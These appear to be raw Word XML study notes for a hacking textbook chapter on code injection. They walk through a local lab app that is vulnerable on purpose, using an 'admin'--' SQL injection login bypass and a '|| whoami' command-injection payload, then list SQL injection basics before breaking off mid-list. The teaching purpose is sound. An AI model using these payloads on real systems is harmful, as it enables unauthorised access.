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A9BC6" w14:textId="03FA7560" w:rsidR="00CD2150" w:rsidRPr="00DF5025" w:rsidRDefault="00CD2150" w:rsidP="00CD2150">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Chapter 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC6B5FA" w14:textId="77777777" w:rsidR="00CD2150" w:rsidRDefault="00CD2150" w:rsidP="00CD2150">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003348F4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B23881D" wp14:editId="5D2981DF">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3E3FF064" w14:textId="6ED7EA26" w:rsidR="00CD2150" w:rsidRPr="00A56427" w:rsidRDefault="00CA57A2" w:rsidP="00CD2150">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA57A2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Injecting Cod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00CD2150">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6E1AFE" w14:textId="1FE57F7A" w:rsidR="00A71336" w:rsidRDefault="00A71336" w:rsidP="00A71336">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A71336">
        <w:t>This section explains that code injection attacks come in many forms, so the book focuses on practical, real-world exploitation rather than theory. It highlights SQL injection as a major and still-dangerous attack and promises to cover modern techniques in detail. By learning several types of injection, readers can apply the same ideas to discover and exploit new ones later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB7812F" w14:textId="5C5CBADC" w:rsidR="00C62216" w:rsidRPr="00A56427" w:rsidRDefault="00C62216" w:rsidP="00C62216">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C62216">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Injecting into Interpreted Languages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF50DA7" w14:textId="667C9A6A" w:rsidR="00C62216" w:rsidRDefault="00C62216" w:rsidP="00C62216">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C62216">
        <w:t>Interpreted languages run code at runtime and often mix user input with program instructions. If user input isn’t handled safely, attackers can inject commands that the interpreter executes as real code. This can lead to full system compromise, especially when scripts run with high privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075ADA58" w14:textId="651EB7C3" w:rsidR="006B6F9B" w:rsidRPr="006B6F9B" w:rsidRDefault="006B6F9B" w:rsidP="00C62216">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Observing injection on local vulnerable website with DB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFF6027" w14:textId="3A144A9B" w:rsidR="006B6F9B" w:rsidRDefault="006B6F9B" w:rsidP="00C62216">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Users.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2C3EB5" w14:textId="589A9EE7" w:rsidR="006B6F9B" w:rsidRDefault="006B6F9B" w:rsidP="00C62216">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006B6F9B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ECEF908" wp14:editId="5AFCDB8D">
            <wp:extent cx="5731510" cy="2647315"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="20490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6599" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2647315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CD91E8" w14:textId="77777777" w:rsidR="006B6F9B" w:rsidRDefault="006B6F9B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A11C55" w14:textId="553CC7E5" w:rsidR="006B6F9B" w:rsidRDefault="006B6F9B" w:rsidP="00C62216">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>App.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEA7E8C" w14:textId="686D8F36" w:rsidR="006B6F9B" w:rsidRDefault="006B6F9B" w:rsidP="00C62216">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006B6F9B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E1BF17E" wp14:editId="5B019AC8">
            <wp:extent cx="5731510" cy="3322320"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="109699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4058" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3322320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E3552F" w14:textId="42CE2FDB" w:rsidR="006B6F9B" w:rsidRDefault="006B6F9B" w:rsidP="00C62216">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFEA87C" w14:textId="5FF009F4" w:rsidR="006B6F9B" w:rsidRDefault="006B6F9B" w:rsidP="00C62216">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006B6F9B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16BAD0D3" wp14:editId="5B6B0B3E">
            <wp:extent cx="5731510" cy="1375410"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14242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925" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1375410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46913E9E" w14:textId="77777777" w:rsidR="006B6F9B" w:rsidRDefault="006B6F9B" w:rsidP="006B6F9B">
      <w:r>
        <w:t xml:space="preserve">Step1: (Goal: SQL injection test.) In normal way. Just visit: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B85E8B5" w14:textId="1482F30A" w:rsidR="006B6F9B" w:rsidRDefault="006B6F9B" w:rsidP="006B6F9B">
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00A23268">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://127.0.0.1:5000/login?username=admin&amp;password=admin123</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4903A585" w14:textId="6BCCF681" w:rsidR="006B6F9B" w:rsidRDefault="006B6F9B" w:rsidP="006B6F9B">
      <w:r w:rsidRPr="006B6F9B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3119B610" wp14:editId="0ED0835F">
            <wp:extent cx="5731510" cy="1257935"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="130846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62524" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1257935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4655E1E1" w14:textId="520B7933" w:rsidR="006B6F9B" w:rsidRDefault="006B6F9B" w:rsidP="006B6F9B">
      <w:r>
        <w:t xml:space="preserve">Now, change it as: </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00A23268">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://127.0.0.1:5000/login?username=admin'--&amp;password=anything</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7A5C49D2" w14:textId="4A3BA27D" w:rsidR="006B6F9B" w:rsidRDefault="006B6F9B" w:rsidP="006B6F9B">
      <w:r w:rsidRPr="006B6F9B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CD57205" wp14:editId="63E5B259">
            <wp:extent cx="5731510" cy="833438"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="39591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12781" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId12"/>
                    <a:srcRect b="31995"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="833438"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="106E9755" w14:textId="6BC39001" w:rsidR="006B6F9B" w:rsidRDefault="006B6F9B" w:rsidP="006B6F9B">
      <w:r>
        <w:t>Clearly, we</w:t>
      </w:r>
      <w:r w:rsidRPr="006B6F9B">
        <w:t xml:space="preserve"> bypass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ed the </w:t>
      </w:r>
      <w:r w:rsidRPr="006B6F9B">
        <w:t>authentication</w:t>
      </w:r>
      <w:r>
        <w:t>. As u</w:t>
      </w:r>
      <w:r w:rsidRPr="006B6F9B">
        <w:t xml:space="preserve">ser input became </w:t>
      </w:r>
      <w:r w:rsidRPr="00E73799">
        <w:t>SQL code</w:t>
      </w:r>
      <w:r w:rsidR="00E73799">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2147A8B0" w14:textId="5F02760F" w:rsidR="00FC1F9D" w:rsidRDefault="00FC1F9D" w:rsidP="006B6F9B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step2: (Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1F9D">
        <w:t>Command Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21792201" w14:textId="75DA71E4" w:rsidR="00FC1F9D" w:rsidRDefault="00FC1F9D" w:rsidP="006B6F9B">
      <w:r>
        <w:t>Add this section to the app.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149729DE" w14:textId="6D236838" w:rsidR="00FC1F9D" w:rsidRDefault="00E000BF" w:rsidP="006B6F9B">
      <w:r w:rsidRPr="00E000BF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="026220A3" wp14:editId="3742FFA2">
            <wp:extent cx="5731510" cy="4568190"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="1164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7188" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4568190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00741852" w14:textId="4FFCCBBA" w:rsidR="00FC1F9D" w:rsidRPr="00FC1F9D" w:rsidRDefault="00FC1F9D" w:rsidP="00FC1F9D">
      <w:r w:rsidRPr="00FC1F9D">
        <w:t>Normal use: http://127.0.0.1:5000/ping?host=127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3381617D" w14:textId="73904825" w:rsidR="00FC1F9D" w:rsidRDefault="00E000BF" w:rsidP="006B6F9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E000BF">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="012CA0C4" wp14:editId="280539BB">
            <wp:extent cx="5731510" cy="494030"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="43930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5336" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="494030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5394F7EB" w14:textId="24F48008" w:rsidR="00E000BF" w:rsidRDefault="00E000BF" w:rsidP="006B6F9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Malicious test: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E000BF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://127.0.0.1:5000/ping?host=invalidhost || whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E723189" w14:textId="281A5875" w:rsidR="00E000BF" w:rsidRDefault="00E000BF" w:rsidP="006B6F9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E000BF">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15C03A6D" wp14:editId="086CE255">
            <wp:extent cx="5731510" cy="987425"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="20629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57290" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="987425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E215607" w14:textId="3FEE24AF" w:rsidR="00DC379B" w:rsidRDefault="00DC379B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="166038E0" w14:textId="7BC805B6" w:rsidR="004547A4" w:rsidRPr="00A56427" w:rsidRDefault="00F81764" w:rsidP="004547A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F81764">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Injecting into SQL</w:t>
      </w:r>
      <w:r w:rsidR="004547A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A274DAA" w14:textId="277F5C45" w:rsidR="00DC379B" w:rsidRPr="00DC379B" w:rsidRDefault="00DC379B" w:rsidP="00DC379B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC379B">
        <w:t>Websites store data in databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DB4434" w14:textId="12D97F56" w:rsidR="00DC379B" w:rsidRPr="00DC379B" w:rsidRDefault="00DC379B" w:rsidP="00DC379B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC379B">
        <w:t>Databases are accessed using SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D469BD" w14:textId="3333CED1" w:rsidR="00DC379B" w:rsidRPr="00DC379B" w:rsidRDefault="00DC379B" w:rsidP="00DC379B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC379B">
        <w:t>If user input is not handled safely, attackers can inject SQL commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE95240" w14:textId="2C034FFD" w:rsidR="00DC379B" w:rsidRPr="00DC379B" w:rsidRDefault="00DC379B" w:rsidP="00DC379B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC379B">
        <w:t>This is called SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B052BE0" w14:textId="3474732C" w:rsidR="00DC379B" w:rsidRPr="00DC379B" w:rsidRDefault="00DC379B" w:rsidP="00DC379B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC379B">
        <w:t>It can lead to total data theft or server takeover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40712D48" w14:textId="6033E41E" w:rsidR="00DC379B" w:rsidRPr="00DC379B" w:rsidRDefault="00DC379B" w:rsidP="00DC379B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC379B">
        <w:t>Modern apps hide errors, so attacks are more subtle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E2F534" w14:textId="30331219" w:rsidR="00DC379B" w:rsidRPr="00DC379B" w:rsidRDefault="00DC379B" w:rsidP="00DC379B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC379B">
        <w:t>Different databases behave differently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE5A1C3" w14:textId="4E5FC6A2" w:rsidR="00DC379B" w:rsidRDefault="00DC379B" w:rsidP="00DC379B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC379B">
        <w:t>Practicing on a local or online database helps a lot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584D2AD6" w14:textId="77777777" w:rsidR="00A518D4" w:rsidRPr="00DC379B" w:rsidRDefault="00A518D4" w:rsidP="00A518D4"/>
    <w:p w14:paraId="748AD87D" w14:textId="69D97EFC" w:rsidR="0060565B" w:rsidRPr="0060565B" w:rsidRDefault="009B1989" w:rsidP="0060565B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Exploiting a Basic Vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="0060565B" w:rsidRPr="0060565B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4481D2A5" w14:textId="3DAD8B00" w:rsidR="00D273E9" w:rsidRPr="00D273E9" w:rsidRDefault="00D273E9" w:rsidP="00D273E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D273E9">
        <w:t>The app builds SQL queries using user input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437AE739" w14:textId="62BDDF7B" w:rsidR="00D273E9" w:rsidRPr="00D273E9" w:rsidRDefault="00D273E9" w:rsidP="00D273E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D273E9">
        <w:t>Quotes (') separate data from SQL code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D054308" w14:textId="58BAE70F" w:rsidR="00D273E9" w:rsidRPr="00D273E9" w:rsidRDefault="00D273E9" w:rsidP="00D273E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D273E9">
        <w:t>An apostrophe in input can break the query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE97521" w14:textId="7ED508D2" w:rsidR="00D273E9" w:rsidRPr="00D273E9" w:rsidRDefault="00D273E9" w:rsidP="00D273E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D273E9">
        <w:t>This exposes SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703F4A0D" w14:textId="2D49B691" w:rsidR="00D273E9" w:rsidRPr="00D273E9" w:rsidRDefault="00D273E9" w:rsidP="00D273E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D273E9">
        <w:t>Attackers can change query logic (OR 1=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4708D779" w14:textId="0295B4A1" w:rsidR="00D273E9" w:rsidRPr="00D273E9" w:rsidRDefault="00D273E9" w:rsidP="00D273E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D273E9">
        <w:t>Comments (--) hide syntax errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4437C253" w14:textId="35E12F39" w:rsidR="00DC379B" w:rsidRPr="00E97321" w:rsidRDefault="00D273E9" w:rsidP="006B6F9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D273E9">
        <w:t>Even small SQL injection bugs are very dangerous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546B2E43" w14:textId="6797EE7C" w:rsidR="00B94229" w:rsidRPr="0060565B" w:rsidRDefault="00BC55FD" w:rsidP="00B94229">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC55FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bypassing a Login</w:t>
      </w:r>
      <w:r w:rsidR="00B94229" w:rsidRPr="0060565B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFFC01D" w14:textId="3C7F834C" w:rsidR="00937EF7" w:rsidRPr="00937EF7" w:rsidRDefault="00937EF7" w:rsidP="00937EF7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00937EF7">
        <w:t>Login systems often use SQL to check usernames and passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7A0E3F" w14:textId="5896299F" w:rsidR="00937EF7" w:rsidRPr="00937EF7" w:rsidRDefault="00937EF7" w:rsidP="00937EF7">
      <w:pPr>
